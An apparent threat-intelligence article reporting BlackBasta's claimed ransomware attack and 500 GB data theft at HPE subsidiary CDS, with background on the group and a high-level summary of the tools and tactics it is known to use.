Ransomware Attack on CDS HPE by BlackBasta: A Detailed Analysis

Overview of CDS HPE

CDS HPE, a wholly-owned subsidiary of Hewlett Packard Enterprise (HPE), operates primarily in Europe, delivering customized technical services and support across various sectors. Established following HPE's acquisition of Synstar, CDS has built a strong reputation in providing infrastructure technical support, including field maintenance, installations, networking support, system administration, and software development. The company employs over 1,500 individuals across ten European countries and reported an annual revenue of approximately $115 million in 2024.

Attack Details

The ransomware group BlackBasta has claimed responsibility for a recent cyberattack on CDS HPE. The attackers have reportedly exfiltrated 500 GB of sensitive data, including company information, confidential documents, human resources and hiring data, personal employee records, client data, and project details. The group has set a ransom deadline for the 23rd of July, 2024, pressuring CDS HPE to comply with their demands to prevent the potential exposure or misuse of the stolen data.

About BlackBasta

BlackBasta is a ransomware operator and Ransomware-as-a-Service (RaaS) criminal enterprise that emerged in early 2022. The group is believed to have connections to the defunct Conti threat actor group. BlackBasta targets organizations in highly targeted attacks, employing a double extortion tactic by encrypting critical data and threatening to publish sensitive information on their public leak site if the ransom is not paid. The group has targeted over 500 organizations worldwide and has made up to $100 million in ransom payments from more than 90 victims since its emergence.

Penetration Methods

BlackBasta employs several strategies to gain initial access to target networks, including spear-phishing campaigns, insider information, and buying network access. Once inside a network, the group uses tools like QakBot, Mimikatz, and exploiting vulnerabilities to move laterally and harvest credentials. For maintaining control over compromised systems, BlackBasta uses tools like Cobalt Strike Beacons, SystemBC, and Rclone. Before encrypting files, the group disables security tools, deletes shadow copies, and exfiltrates sensitive data to maximize their leverage.

Vulnerabilities and Impact

CDS HPE's extensive operations and large workforce make it a lucrative target for ransomware groups like BlackBasta. The company's reliance on customized technical services and support across various sectors, combined with the sensitive nature of the data it handles, increases its vulnerability to cyberattacks. The exfiltration of 500 GB of sensitive data could have significant repercussions for CDS HPE, including potential financial losses, reputational damage, and operational disruptions.

Sources

• RocketReach - CDS HPE Company Profile
• BlackBerry - Black Basta Ransomware Protection
• Flashpoint - Understanding Black Basta Ransomware
• Sangfor - Black Basta Ransomware Attack
• Exponential-e - Black Basta Ransomware Group's Techniques